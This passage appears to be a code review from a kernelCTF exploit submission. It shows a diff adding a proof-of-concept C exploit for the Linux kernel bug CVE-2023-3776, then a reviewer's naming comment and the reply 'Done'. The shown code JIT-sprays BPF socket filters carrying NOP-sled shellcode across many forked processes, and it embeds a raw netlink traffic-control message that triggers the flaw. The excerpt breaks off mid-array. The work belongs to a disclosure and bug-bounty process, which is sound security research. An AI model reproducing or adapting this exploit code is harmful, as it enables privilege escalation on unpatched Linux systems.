pocs/linux/kernelctf/CVE-2023-3776_cos_mitigation/exploit/mitigation-6.1/poc.c

```diff
@@ -0,0 +1,271 @@
+#include <sys/resource.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <string.h>
+#include <pthread.h>
+#include <signal.h>
+#include <linux/filter.h>
+#include <linux/seccomp.h>
+#include <sys/sendfile.h>
+#define SYSCHK(x) ({              \
+    typeof(x) __res = (x);        \
+    if (__res == (typeof(x))-1)   \
+        err(1, "SYSCHK(" #x ")"); \
+    __res;                        \
+})
+
+#define PAUSE           \
+    {                   \
+        printf(":");    \
+        int x;          \
+        read(0, &x, 1); \
+    }
+extern void write_to_cpu_entry_area(void *buf);
+void handle(int s) {}
+void set_cpu(int i)
+{
+    cpu_set_t mask;
+    CPU_ZERO(&mask);
+    CPU_SET(i, &mask);
+    sched_setaffinity(0, sizeof(mask), &mask);
+}
+int cfd[2];
+int sfd[0x200][2];
+char payload[0x1000];
+char buf[0x1000];
+struct sock_filter filter[0x1000];
+int stopfd[2];
+
+int sc(void)
+{
+    set_cpu(1);
+    unsigned int prog_len = 0x900;
+    /* In current environment, the max instructions in a program is near 0x900
+    And we test 0x900 instructions * 0x50 forks * 0x100 sockets * 4 = 180 MB is enough large to spray and worked reliably
+    */
+    struct sock_filter table[] = {
+        {.code = BPF_LD + BPF_K, .k = 0xb3909090},
+        {.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}};
+
+/* 0xb3909090 is NOPsled shellclode to make exploitation more reliable
+90       nop
+90       nop
+90       nop
+b3 b8    mov    bl, 0xb8
+*/    
+
+    for (int i = 0; i < prog_len; i++)
+        filter[i] = table[0];
+
+    filter[prog_len - 1] = table[1];
+    int idx = prog_len - 2;
+
+#include "sc.h"
+
+    struct sock_fprog prog = {
+        .len = prog_len,
+        .filter = filter,
+    };
+    int fd[2];
+    for (int k = 0; k < 0x50; k++)
+    {
+        if (fork() == 0) // use fork to bypass RLIMIT_NOFILE limit.
+        {
+            close(stopfd[1]);
+            for (int i = 0; i < 0x100; i++)
+            {
+                SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
+                SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)));
+            }
+            write(stopfd[0], buf, 1);
+            read(stopfd[0], buf, 1);
+            exit(0);
+        }
+    }
+    /* wait for all forks to finish spraying BPF code */
+    read(stopfd[1], buf, 0x50);
+}
+char POC[0x1000];
+
+// the payload generated from `tc class delete dev lo classid 1:10`
+// to generate payload from `tc` command, we can breakpoint at `netlink_sendmsg`
+// after `tc` command is run, and we can dump the payload using this gdb command:
+// dump binary memory /tmp/tc_del msg->msg_iter.iov[0].iov_base msg->msg_iter.iov[0].iov_base+msg->msg_iter.iov[0].iov_len
+// refs: https://man7.org/linux/man-pages/man7/rtnetlink.7.html https://wiki.slank.dev/book/types.html
+size_t DEL[] = {
+    0x0005002900000024, 0x00000000649bcb96,
+    0x0000000100000000, 0x0001000000010010,
+    0x0000000000000000};
+
+size_t payment[] = {
```

Comment:
Please use a more expressive variable name, for example `netlink_filter_payload` as there are multiple payloads are used in the exploit and it's easier to confuse them with eachother.

Reply:
Done